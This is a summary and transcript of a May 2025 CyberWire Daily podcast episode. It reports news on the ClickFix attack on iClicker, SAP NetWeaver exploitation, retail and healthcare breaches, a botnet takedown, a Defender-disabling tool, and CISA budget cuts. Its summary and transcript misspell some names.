No quick fix for a ClickFix attack. - CyberWire Daily

Summary10 min read

CyberWire Daily: No Quick Fix for a ClickFix Attack

Release Date: May 12, 2025

Introduction

In this episode of CyberWire Daily, host Dave Bittner discusses the latest cybersecurity threats and incidents impacting various sectors. The episode delves into a sophisticated social engineering attack on the IClicker platform, significant privacy settlements involving Google, widespread cyberattacks affecting retail chains in the UK, and critical vulnerabilities exploited by state-sponsored hackers. Additionally, the episode features an in-depth interview with Tim Starks, a senior reporter from Cyberscoop, who sheds light on proposed budget cuts to the Cybersecurity and Infrastructure Security Agency (CISA) and the political dynamics surrounding them.

Major Security Incidents

ClickFix Social Engineering Attack on IClicker

Between April 12th and 16th, 2025, the student engagement platform IClicker, utilized by approximately 5,000 instructors and 7 million students across major US universities like Michigan and Florida, fell victim to a sophisticated ClickFix social engineering attack. The attack involved a fake CAPTCHA that deceived users into executing a malicious PowerShell script. This script, once run, connected to a remote server to download additional malware, which either granted hackers full access or installed benign software to evade detection. The likely payload was an information stealer targeting credentials, browser data, and cryptocurrency wallets.

IClicker’s Response: On May 6th, IClicker confirmed the breach, assuring that their applications and data remained unaffected and that the vulnerability had been patched. However, the exact number of affected users remains uncertain.

Google's Privacy Settlement with Texas

Google is set to pay $1.375 billion to the state of Texas to resolve allegations that it secretly tracked users’ locations, private browsing activities, and biometric data without consent. The lawsuit, spearheaded by Attorney General Ken Paxton, claims that Google continued tracking users even with location services disabled and utilized collected data for advertising revenue. Additionally, it is alleged that Google amassed biometric data, such as facial geometry, without proper consent.

Google’s Stance: Google has denied wrongdoing but has updated its privacy policies in response to the allegations.
Significance: This settlement marks one of the largest privacy-related fines in the United States.

Cyberattack on UK’s Co-Op Stores

Co-Op, a major retail cooperative in the UK with over 3,000 locations, is grappling with severe operational disruptions due to a prolonged cyberattack that began two weeks prior to the episode's release. The attack has led to empty shelves as key logistics systems remain offline, hindering deliveries.

Impact on Operations: Staff report that depot shipments have dropped to below 20% of normal levels, prioritizing perishable items like meat, dairy, and eggs, while non-perishables such as produce, canned goods, and cigarettes remain scarce.
Data Compromise: CEO Shirin Khoury Hawk confirmed that customer and member data were compromised, although the specific nature of the hack remains unclear.
Recovery Efforts: Despite all stores remaining open, the recovery process is expected to take several weeks. On the Scottish island of Islay, Co-Op has implemented special delivery procedures to mitigate the impact.

Ascension Health Data Breach

Ascension Health reported a data breach affecting over 437,000 patients due to a vulnerability in a third-party vendor's software, not their own systems. Hackers exploited this flaw to steal sensitive information, including names, contact details, Social Security numbers, and health data. The breach is linked to the Clop ransomware group's December 2023 attack on Clio’s file transfer platform.

Response: Impacted patients are being offered two years of free credit monitoring.
Historical Context: This incident is smaller compared to Ascension's May 2024 ransomware attack, which affected 5.6 million individuals.

Critical Zero-Day Vulnerability in SAP Netweaver

A critical zero-day vulnerability in SAP Netweaver's Internet Communication Manager has been actively exploited by Chinese state-sponsored hackers. The flaw allows unauthenticated remote code execution via crafted HTTP requests.

Current Exploitation: Despite the release of emergency patches, many SAP systems remain exposed.
Target Sectors: High-value sectors such as finance and manufacturing are primary targets, aiming to steal sensitive data and establish persistent access.
Detection Challenges: Researchers identified custom malware named Safire, which uses encrypted communication over SAP protocols, complicating detection efforts.
Operational Impact: The attack chain initiates with a malicious SOAP request exploiting memory corruption, delivering a reverse shell, and subsequently modifying SAP configurations to maintain access. This campaign has disrupted operations in critical sectors, including healthcare, government, and infrastructure.

Varonis Uncovers Major Cybersecurity Threats

Varonis has identified two significant cybersecurity threats targeting IT administrators and cloud systems:

SEO Poisoning for Malware Delivery:
- Method: Attackers exploit search engine optimization (SEO) poisoning to trick administrators into downloading malware masquerading as legitimate tools.
- Consequences: These fake downloads can install backdoors like Smokemant or monitoring software, leading to credential theft and data exfiltration. In one instance, nearly a terabyte of data was stolen before a ransomware attack ensued.
Critical Root Access Flaw in Azure’s AZNFS Mount Utility:
- Vulnerability: A flaw in Azure's AZNFS Mount utility, used in High-Performance Computing (HPC) and AI workloads, allows unprivileged users to escalate privileges to root by exploiting environment variables.
- Severity: Although Microsoft has rated it as low severity, the potential for complete cloud compromise is significant.
- Recommendations: Varonis urges immediate patching and advocates for a defense-in-depth strategy to mitigate exposure.

US Prosecutors Charge Foreign Nationals in Botnet Takedown

US prosecutors have charged three Russians and one Kazakhstani in relation to the dismantling of two major botnets, Any Proxy and Five Socks. These botnets were part of an operation named Moonlander, which fraudulently converted outdated wireless routers into proxy servers available for rent on seized websites, offering over 7,000 proxies and generating approximately $46 million over two decades.

Operation Details: The campaign involved international cooperation and technical analysis from Lumen Technologies. Infected routers were primarily located in Oklahoma but had a global reach across more than 80 countries.
Security Implications: The FBI warns that outdated routers, particularly older models from Linksys, Cisco, and TP-Link, remain prime targets for exploitation by various threat actors, including Chinese hackers.
Preventative Measures: Authorities recommend replacing unsupported routers to prevent similar compromises.

Defendnaut: A New Tool Disabling Microsoft Defender

A newly developed tool named Defendnaut has emerged, which disables Microsoft Defender by exploiting the Windows Security Center API. Created by a GitHub developer, Defendnaut tricks Windows into recognizing a fake antivirus product as legitimate, thereby prompting the automatic disabling of Defender to avoid conflicts.

Mechanism: The tool leverages reverse-engineered interactions with the undocumented Windows Security Center (WSC) API, injecting its code into trusted processes like Task Manager.
Persistence and Risks: While Defendnaut requires administrative privileges and persistent installation to survive reboots, its ability to disable Defender poses significant risks if misused by malware developers.
Expert Insights: Security experts highlight that although Defendnaut may not showcase advanced technical prowess, it exposes a critical security gap in how Windows manages antivirus product registration. The tool builds upon the developer’s previous project, nodefender, emphasizing the need for enhanced safeguards within WSC’s architecture.

Interview with Tim Starks: CISA Budget Cuts and Political Reactions

Tim Starks, a senior reporter from Cyberscoop, provides an in-depth analysis of the proposed $491 million budget cut to CISA, representing approximately 17-20% of its funding. This potential reduction has sparked significant controversy among lawmakers and cybersecurity experts.

Key Points from the Interview:

Budget Proposal Context:
- The administration's skinny budget proposal indicated substantial cuts to CISA without detailed justifications.
- The rhetoric suggests that CISA is viewed by some as part of a "censorship industrial complex," although the administration has not provided concrete evidence to support this claim.
Legislative Reactions:
- Democratic Appropriators have vehemently opposed the cuts, labeling them a "killing blow" to the agency’s capabilities.
- Republican Committee Chairperson Mark and Madai expressed the need for more detailed explanations, highlighting ongoing threats from China and Russia and questioning the rationale behind reducing CISA's budget.
- Senator Chris Murphy, the top Democrat on the Homeland Security Appropriations Subcommittee, labeled the cuts as an "illegal gutting of cybersecurity at DHS" intended to divert funds to border security.
Administration’s Justification:
- The administration claims budget cuts are necessary to reduce the size of government, though this justification appears more ideological than based on CISA’s performance or needs.
CISA’s Current Status:
- CISA has already experienced personnel and program cuts, including the elimination of roles focused on monitoring extremist activities.
- Kristi Noem, a prominent Republican, has referred to CISA as the "Ministry of Truth," echoing concerns about the agency's role in misinformation and censorship.
Leadership and Future Outlook:
- The nominee for CISA, Sean Plenky, is regarded as a competent cybersecurity professional who may strive to shield the agency from political interference and maintain its core mission despite budgetary constraints.
- Historical parallels were drawn with the first Trump administration’s approach under Chris Krebs, who effectively kept CISA operational without getting entangled in political disputes.
Strategic Implications:
- Given the persistent cyber threats from nation-states, critics argue that cutting CISA’s budget undermines national cybersecurity resilience.
- Tim Starks expressed skepticism about the administration's rationale, emphasizing the ongoing need for robust cybersecurity measures in the face of escalating threats.

Notable Quotes:

Tim Starks [14:32]: "It's a pretty massive potential cut. And the reasons they talked about doing this, you know, they don't go into a lot of details..."
Senator Chris Murphy [17:26]: "This was illegal because you're ignoring congressional mandates."
Tim Starks [20:39]: "It doesn't make a lot of sense, like we were talking about. Why, you know, if you're, if you're concerned about Russia and China... that CISA has stood by and said, we believe Russia is a cyber threat."

Additional Security Insights

Common Denominators in Security Incidents

Dave Bittner highlights that the common denominator in security incidents is the escalation and lateral movement within networks. Compromised privileged accounts can lead to attackers seizing control of critical assets, especially in environments with poor directory hygiene and extensive technical debt. Identity attack paths, particularly in Active Directory, Entra ID, and hybrid configurations, remain attractive targets for threat actors due to their exploitability and the difficulty defenders face in detecting such breaches.

Mitigation Strategy: Identity leaders are increasingly employing attack path management to connect identity and security teams, thereby reducing risk. Tools like Bloodhound Enterprise powered by SpectreOps are instrumental in visualizing and securing attack paths.

US Copyright Office AI Study

The US Copyright Office released a pre-publication version of part three of its AI study, coinciding with the abrupt dismissal of its top leadership. The 108-page report examines how copyright law, particularly fair use, should apply to AI training processes.

Key Findings:
- Presumptive Infringement: The report posits that copying during AI training is presumptively infringing and that even the model's weights may contain protected expressions.
- Fair Use Criteria: Emphasizes that fair use depends on the ultimate application of the AI, not merely its training methodology.
- Market Dilution Theory: Introduces a novel theory suggesting that AI-generated content could flood markets and devalue them, even without direct copying.
Legal Implications: While courts are not bound by the report, its detailed reasoning is expected to influence over 40 ongoing copyright cases involving generative AI. The report’s future impact remains uncertain due to shifting political landscapes, but its legal arguments are already influencing broader discussions.

Conclusion

This episode of CyberWire Daily underscores the evolving and multifaceted nature of cybersecurity threats in 2025. From sophisticated social engineering attacks on educational platforms to significant privacy settlements and state-sponsored exploits, the landscape remains perilous. The in-depth interview with Tim Starks highlights the precarious position of CISA amidst political maneuvering, emphasizing the need for sustained investment in cybersecurity infrastructure. Additionally, emerging tools like Defendnaut and comprehensive studies on AI’s legal implications underscore the continuous arms race between threat actors and defenders. Staying informed and proactive is imperative for both organizations and individuals to navigate the complex cybersecurity terrain effectively.

Notable Quotes with Timestamps:

Dave Bittner [00:02]: "We're going to talk about why attackers still love Web apps in 2025..."
Tim Starks [14:30]: "The administration's skinny budget... indicated that they would be looking to cut CISA's budget by $491 million."
Tim Starks [16:36]: "Senator Murphy's case was, this is illegal because you're ignoring congressional mandates."
Tim Starks [17:26]: "Senator Murphy's case was, this is illegal because you're ignoring congressional mandates."
Tim Starks [20:39]: "It doesn’t make a lot of sense... why would you cut these agencies? They need to do a better job..."
Dave Bittner [20:59]: "Our adversaries are not slowing down or dialing back their investments in misinformation..."
Tim Starks [22:19]: "Sean Plenky... can find a way to walk that tightrope."

Credits

Senior Producer: Alice Carruth
Producer: Liz Stokes
Mixer: Trey Hester
Music & Sound Design: Elliot Peltzman
Executive Producer: Jennifer Ibin
Publisher: Peter Kilpe
Host: Dave Bittner

Additional Resources

Register for CyberWire’s Live Webinar: Visit events.thecyberwire.com to register for the live discussion on the state of modern web application security.
DeleteMe Special Offer: Listeners can receive a 20% discount on DeleteMe plans by visiting JoinDeleteMe.com N2K and using promo code N2K at checkout.
ThreatLocker: Explore ThreatLocker’s solutions at www.threatlocker.com to secure your environment against ransomware and other attacks.
Vanta Compliance Automation: Learn more about automating security compliance with Vanta at vanta.com.

Stay Informed: For more insights and daily briefings, subscribe to CyberWire Daily and ensure you’re equipped with the knowledge to stay ahead in the ever-changing cybersecurity landscape.

Loading summary

Transcript19 lines

[00:02]
Dave Bittner
You're listening to the Cyberwire Network, powered by N2K. Hey everybody, Dave here. Join me and my guests Outpost 24's Laura Enriquez and Michaelo Steppa on Tuesday, May 13th at noon Eastern time for a live discussion on the biggest threats hitting web applications today and what you can do about them. We're going to talk about why attackers still love Web apps in 2025, the latest threat trends shaping the security landscape how to spot and prioritize critical vulnerabilities fast, along with scalable practical steps to strengthen your defenses. Again, the webinar is Tuesday, May 13th for our live conversation on the state of modern Web application security. You can register now by visiting events.thecyberwire.com that's events.thecyberwire.Com we'll see you there. Hey everybody, Dave here. I've talked about Deleteme before and I'm still using it because it still works. It's been a few months now and I'm just as impressed today as I was when I signed up. Delete Me keeps finding and removing my personal information from data broker sites and they keep me updated with detailed reports so I know exactly what's been taken down. I'm genuinely relieved. Knowing my privacy isn't something I have to worry about every day. The Deleteme team handles everything. It's the set it and forget it peace of mind. And it's not just for individuals. Deleteme also offers solutions for businesses, helping companies protect their employees personal information and reduce exposure to social engineering and phishing threats. And right now, our listeners get a special deal 20% off your delete me plan. Just go to JoinDeleteMe.com N2K and use promo code N2K at checkout. That's JoinDeleteMe.com N2k code N2K a major student student engagement platform falls victim to the Click Fix social engineering attack Google settles privacy allegations with Texas for over $1.3 billion stores across the UK face empty shelves due to an ongoing cyber attack. Ascension Health reports that over 437,000 patients were affected by a third party data breach. A critical zero day vulnerability in SAP Netweaver is being actively exploited. Researchers uncover two major cybersecurity threats targeting IT, admins and cloud systems. US prosecutors charged three Russians and one Kazakhstani in connection with the takedown of two major botnets. A new tool disables Microsoft Defender by tricking Windows into thinking a legitimate antivirus is installed. Tim Starks, senior reporter from cyberscoop, discusses congressional reactions to White House budget cut, proposals for CISA and fair use faces limits in generative AI foreign May 12, 2025 I'm Dave Bittner and this is your Cyberwire Intel Briefing. Happy Monday and thanks for joining us here today. It is great to have you with us. IClicker is a student engagement platform used by about 5,000 instructors and 7 million students at US colleges, including major universities like Michigan and Florida. Between April 12th and the 16th of this year, its website was compromised in a click fix social engineering attack. A fake captcha tricked visitors into running a malicious PowerShell script by copying it from the clipboard into the Windows Run dialog. Once executed, the script connected to a remote server to fetch more malware. Depending on the visitor, the attack either gave hackers full access or downloaded harmless software to avoid detection. The likely payload was an information stealer, targeting credentials, browser data and cryptocurrency wallets. IClicker confirmed the breach on May 6, stating its apps and data were unaffected and the vulnerability had been fixed. The number of affected users is still unknown. Google will pay $1.375 billion to Texas to settle claims it secretly tracked users locations, private browsing activity and biometric data without consent. The lawsuit, led by Attorney General Ken Paxton, allege that Google continued tracking users even with location services off and used the data for advertising profits. It also claimed Google collected biometric data like facial geometry without proper consent. Google denies wrongdoing but has since updated its policies. The settlement is one of the largest US Privacy related fines. Co Op stores across the UK are facing empty shelves due to an ongoing cyber attack that began two weeks ago. Fearing hackers may still have access, the company has kept key logistics systems offline, severely disrupting deliveries. Staff report depot shipments are below 20% of normal, with meat, dairy and eggs prioritized due to perishability laws. Other items like produce, canned goods and cigarettes remain scarce. CEO Shirin Khoury Hawk confirmed customers and member data was compromised, though the nature of the hack is still unclear. Despite all stores remaining open, recovery is expected to take weeks. On the Scottish island of Islay, where Co Op is the only major grocer, special delivery processes are in place. Co Op, a member owned cooperative, operates over 3,000 locations and does not have to report financial losses to public markets. Ascension Health reported that over 437,000 patients were affected by a data breach tied to a third party vendor's software vulnerability, not its own systems. Hackers exploited this flaw to steal sensitive data including names, contact details, Social Security numbers and health information. The breach likely stemmed from the Clop ransomware group's December 2023 attack on Clio's file transfer platform. Impacted patients are being offered two years of free credit monitoring. This breach is smaller than Ascension's May 2024 ransomware incident affecting 5.6 million. A critical zero day vulnerability in SAP Netweaver is being actively exploited by Chinese state sponsored hackers. The flaw, found in the Internet Communication Manager component of allows unauthenticated remote code execution via crafted HTTP requests. Despite emergency patches, many SAP systems remain exposed. Attackers are targeting high value sectors like finance and manufacturing to steal sensitive data and establish persistent access. Researchers found that custom malware dubbed safire uses encrypted communication over SAP protocols, making detection difficult. The attack chain begins with a malicious SOAP request that exploits memory corruption and delivers a reverse shell. From there, attackers modify SAP configurations to maintain access. The sophisticated campaign raises concerns about supply chain risks and has already caused operational disruptions across critical sectors, including healthcare, government and infrastructure. Varonis has uncovered two major CyberSecurity threats targeting IT admins and cloud systems. First, attackers are using SEO poisoning to trick admins into downloading malware disguised as legitimate tools. These fake downloads can install backdoors like smoked ham or monitoring software, enabling credential theft and data exfiltration. In one case, nearly a terabyte of data was stolen from followed by a ransomware attack. Separately, Varonis found a critical root access flaw in Azure's AZNFS Mount utility. Used in HPC and AI workloads, the bug lets unprivileged users escalate to root by exploiting environment variables. Though Microsoft rated it low severity, the risk of full cloud compromise is significant. Varonis urges immediate patching and recommends a defense in depth strategy to reduce exposure. US Prosecutors have charged three Russians and one Kazakhstani in connection with a takedown of two major botnets, Any proxy and five Socks. The suspects allegedly ran a malware campaign that hijacked outdated wireless routers, converting them into proxy servers for rent on the seized websites. The botnets offered over 7,000 proxies, generating $46 million over 20 years. The operation, named Moonlander, involved international cooperation and technical analysis from Lumen Technologies. Many infected routers were found in Oklahoma, with global reach across over 80 countries. The FBI warns that outdated routers, especially older Linksys, Cisco and TP link models, are prime targets for exploitation by threat actors, including Chinese hackers. Two defendants also face charges of using false identities to register domains. Authorities urge replacing unsupported routers to avoid similar compromises. A new tool called defendnaut disables Microsoft Defender by exploiting the Windows Security center API, tricking Windows into thinking a legitimate antivirus is installed. Created by a GitHub developer, Defendnaut registers a fake antivirus product using reverse engineered interactions with the undocumented WSC API, bypassing Microsoft's integrity checks by injecting its code into trusted processes like Task Manager. Once registered, Windows automatically disables Defender to avoid conflicts. While the tool requires admin privileges and persistent installation to survive reboots, it poses a risk if abused by malware developers. Security experts warn that although Defend not showcases impressive technical skill, it highlights a significant security gap in how Windows handles AV product registration. The tool builds on the developer's earlier project nodefender and underscores the need for better safeguards in WSC's architecture. Coming up after the break, my conversation with Tim Starks from cyberscoop discussing congressional reactions to White House budget cut, proposals for CISA and fair use faces limits in generative AI stick around and now a word from our sponsor, ThreatLocker keeping your system secure shouldn't mean constantly reacting to threats. ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com. foreign let's be real. Navigating security compliance can feel like assembling IKEA furniture without the instructions. You know you need it, but it takes forever, and you're never quite sure if you've done it right. That's where Vanta comes in. Vanta is a trust management platform that automates up to 90% of the work for frameworks like SoC2, ISO 27001 and HIPAA, getting you audit ready in weeks, not months. Whether you're a founder, an engineer, or managing IT and security for the first time, Vanta helps you prove your security posture without taking over your Life. More than 10,000 companies, including names like Atlassian and Quora, trust Vanta to monitor compliance, streamline risk, and speed up security reviews by up to five times and the roi, A recent IDC report found Vanta saves businesses over half a million dollars a year and pays for itself in just three months. For a limited time, you can get $1,000 off vanta@vanta.com cyber that's v a n-t a.com it is always my pleasure to welcome back to the show Tim Starks. He is a senior reporter at cyberscoop. Tim, welcome back.
[14:31]
Tim Starks
It's great to be back.
[14:32]
Dave Bittner
So, Tim, you have posted a couple of stories over on cyberscoop in the past week or so looking at some of the proposed cuts to CISA and reactions from lawmakers about that. Can you unpack some of your reporting here for us?
[14:50]
Tim Starks
Yeah, sure. We, we start the tail end of what would have been May 2, I think, where the administration put out its, its, its skinny budget that they called it basically lacking major details. But, but it indicated that they would be looking to cut CISA's budget by $491 million, which is, you know, I think I estimated it was 17%. Lawmakers have been saying close to 20%. I think both are accurate, but it's a pretty massive potential cut. And the reasons they talked about doing this, you know, they don't go into a lot of details, but they talk about this, this notion that the Trump administration has that the CISO was part of the censorship industrial complex. We can talk more about whether that's true or not in a second. But, you know, we saw, we saw some reaction from lawmakers. First on the House side, the appropriators, Democrats were very harsh about this cut. They were basically were saying this would be a killing blow for the agency and other other things. The Republican chairman of the committee Subcommittee on Homeland Security, Mark and Madai had said we need more details than this. We're hearing that China and Russia are kicking our butts. And here we are looking to cut this agency. So you need to really show us why we think, why you, why, why you think we need to do that. And then continues on into later the week in which on, on Thursday of, of this week, it was the sentence time to do this. And the top Democrat on the Homeland Security Appropriation Subcommittee, Chris Murphy, said that this was an illegal gutting of, of cybersecurity at DHS to pay for the border. And that gets us up to speed.
[16:36]
Dave Bittner
Well, let's go in a little reverse order then, from where you laid things out for us. Talking about Senator Murphy, what is the case that he's making that these cuts might be illegal?
[16:48]
Tim Starks
Yeah, he was painting with a broader brush when he said, when he was talking about the powers of the purse that Congress has. I mean, the idea is Congress appropriates money, the executive branch spins it. And there have been a lot of things happening at CISA where cuts have already happened to personnel Cuts have already happened to programs. There are talks about even more cuts. You know, potentially a thousand plus people at a 3,000 person agency. And Senator Murphy's case was, this is illegal because you're ignoring congressional mandates.
[17:27]
Dave Bittner
Let's talk about Kristi Noem, who has referred to CISA as playing the role of the Ministry of Truth.
[17:38]
Tim Starks
Yeah.
[17:40]
Dave Bittner
This rhetoric, I guess it feels old to me. I feel as though after the 2020 election, and we had members of Trump, Trump himself, and of course his inner circle saying that the election was fraudulent and all of those things, which, as we know, got played out in many, many courtrooms across the country. But my sense after all of that was that CISA was maybe out of self interest, backing away from the misinformation role on their own. And so it seems to me like this stuff coming from Kristi Noem is kind of a solution in search of a problem.
[18:25]
Tim Starks
I think that's a good characterization. Trying not to editorialize here, but the administration, the Biden administration, really backed off of anything it was doing on misinformation, disinformation, which by the way, was at best a minuscule amount of the work that the agency was doing. Then the Secretary of Homeland Security herself evicted anybody who was in the election security community who was within cisa, who was still working on misinformation or disinformation anyway, and explicitly related to election security. So, and that, and that was, you know, I think the most revealing exchange, even though we led our story with Senator Murphy, was between Senator Peters and Christine Ohm, with him basically saying, okay, so you got rid of 15 people out of 3,000. How are you trying to get the agency back on mission? And she says it is back on mission. But that's contradicted by the fact that if you look at what little information there is in the Trump administration budget proposal for fiscal 2026, their. Their major reason that they're saying that we need to cut back on this agency is that it's being this Ministry of Truth kind of thing. So it's. It's a little confusing about. About whether they believe this is still going on and if so, what ways. I mean, there are other programs that people have singled out there. DHS has also gotten rid of. So things like monitoring, unlike extremism, DHS has cut contracts for that under this administration. So you start to wonder where the 491 million comes from, and whether to quote Lauren Underwood, the top Democrat on the House Appropriations Subcommittee, that this isn't about cutting fat, this is about deep cuts And I think probably it's a justification you can use, especially to the right. If you're saying we need to cut the size of government overall and CISA has 3,000 people, we're going to have to cut some people there, too. That's what it kind of feels like to me, is that this is more an excuse. But maybe, you know, maybe they'll surprise us. And when they finally do release the full budget, which appropriators don't know when that's going to happen, they said at the, at these two sessions, maybe they'll reveal what they're cutting and we'll say, oh, that's what they were referring to. Or at least it'll make a little bit of sense. Whether you agree or disagree with their interpretation of things, you'll at least be able to point out and say, I understand their reasoning right now. I don't understand, frankly.
[20:39]
Dave Bittner
Yeah, I mean, obviously I'm left scratching my own head. Just that it doesn't. Clearly our adversaries are not slowing down or dialing back their investments in misinformation or their attempts to get into our systems. So it would seem to me like the mission is as important as ever.
[20:59]
Tim Starks
Yeah, on that, on that front specifically, you know, if you were, if you were saying, I'm concerned about the government censoring American speech, well, they've gotten rid of State Department programs that are focused on foreign misinformation campaigns. So I don't know. You know, it doesn't make, it still doesn't make a lot of sense, like we were talking about. Why, you know, if you're, if you're concerned about Russia and China and they, you know, to their credit, despite the issues that this president has had with Russia and whether he's too close to it, that the CISA has stood by and said, we believe Russia is a cyber threat. So if you think they're threats, why would you cut these agencies? They need to do a better job, I think, than they have so far to convince me that they have a case. And that's always kind of like my baseline as a reporter. Like, do they have a case? And then you make the case in the story, you explain that case, you let the media decide. But right now, I don't hear a case. It doesn't make sense.
[21:53]
Dave Bittner
Well, when we look at proposed leadership for cisa, is it possible that we could find ourselves in a situation where we have a leader who shields the workers from all of this political rhetoric and just says, hey, everybody, heads down, we're going to continue our important work, we're going to make the most of the funds we have. Let me take all of the heat on all of this political stuff, but we've got work to do.
[22:20]
Tim Starks
I think it's possible. I think we actually saw that under the first Trump administration.
[22:25]
Dave Bittner
Yeah.
[22:26]
Tim Starks
Chris Krabs, at least until the very end, did a good job of keeping CISA off of the President's radar. And, you know, the nominee for the CISA job is Sean Plenky. He has a good reputation out there in the cyber world, left and right. He's considered a smart operator. So we'll see what he does. You know, when the time comes that he does have his hearing, what kind of things he'll say. To walk this tightrope, of wanting to run an agency that you believe in, but also having it being cut under your feet by your own president. We'll see what he can get done. I think it's at least possible that he can mitigate some of these things. I think there was another hearing that I tuned into a little bit this week where Kash Patel, who is probably as loyalist as it gets to Trump, was saying that the FBI needed more money than the budget proposal. So if he's saying it, um, I wonder if somebody who's less ideologically aligned, and I don't mean to say that Sean Plank is not conservative, because my understanding is that he is, but if somebody who's less ideologically aligned to this MAGA movement, maybe that person can. Can find a way to walk that tightrope.
[23:37]
Dave Bittner
Yeah. All right. Well, we will have links to all of Tim's reporting on these topics in our show. Notes. Tim Starks is senior reporter at cyberscoop. Tim, thanks so much for taking the time for us.
[23:50]
Tim Starks
Thank you, Dave.
[24:05]
Dave Bittner
What's the common denominator in security incidents? Escalations and lateral movement. When a privileged account is compromised, attackers can seize control of critical assets. With bad directory hygiene and years of technical debt. Identity attack paths are easy targets for threat actors to exploit, but hard for defenders to detect. This poses risk in active directory, entra ID and hybrid configurations. Identity leaders are reducing such risks. With attack path management. You can learn how attack path management is connecting identity and security teams while reducing risk with Bloodhound Enterprise powered by SpectreOps. Head to SpectorOps IO today to learn more. Spectrops, see your attack paths the way adversaries do. And finally, late last Friday, in a move as quietly timed as it was politically charged, the US Copyright Office released a pre publication version of part three of its AI study just hours before its top leadership was abruptly dismissed. The 108 page report tackles how copyright law, especially fair use, should apply to AI training. It argues that copying during training is presumptively infringing and that even the model's weights may embed protected expression. The report emphasizes that fair use hinges on how the AI is ultimately used, not just how it's trained. Particularly striking is the office's endorsement of a novel market dilution theory, warning that AI generated content could flood and devalue markets even without direct copying. While courts are not bound by the report, its detailed reasoning could shape the over 40 ongoing copyright cases involving generative AI. Whether the report survives changing political winds remains uncertain, but its legal implications are already rippling outward. And that's the Cyber Wire for links to all of today's stories, check out our daily briefing@thecyberwire.com don't forget to check out the Grumpy Old Geeks podcast, where I contribute to a regular segment on Jason and Brian's show every week. You can find Grumpy Old Geeks, where all the fine podcasts are listed. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2k.com N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're mixed by Trey Hester with original music and sound design by Elliot Peltzman. Our executive producer is Jennifer Ibin. Peter Kilpe is our publisher and I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow. And now a word from our sponsor. Spy Cloud Identity is the new battleground and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. Spy Cloud's holistic Identity Threat Protection helps security teams uncover and automatically remediate hidden exposures across your users from breaches, malware and phishing to neutralize identity based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate Darknet exposure report@spycloud.com cyberwire and see what attackers already know. That's spycloud.com cyberwire.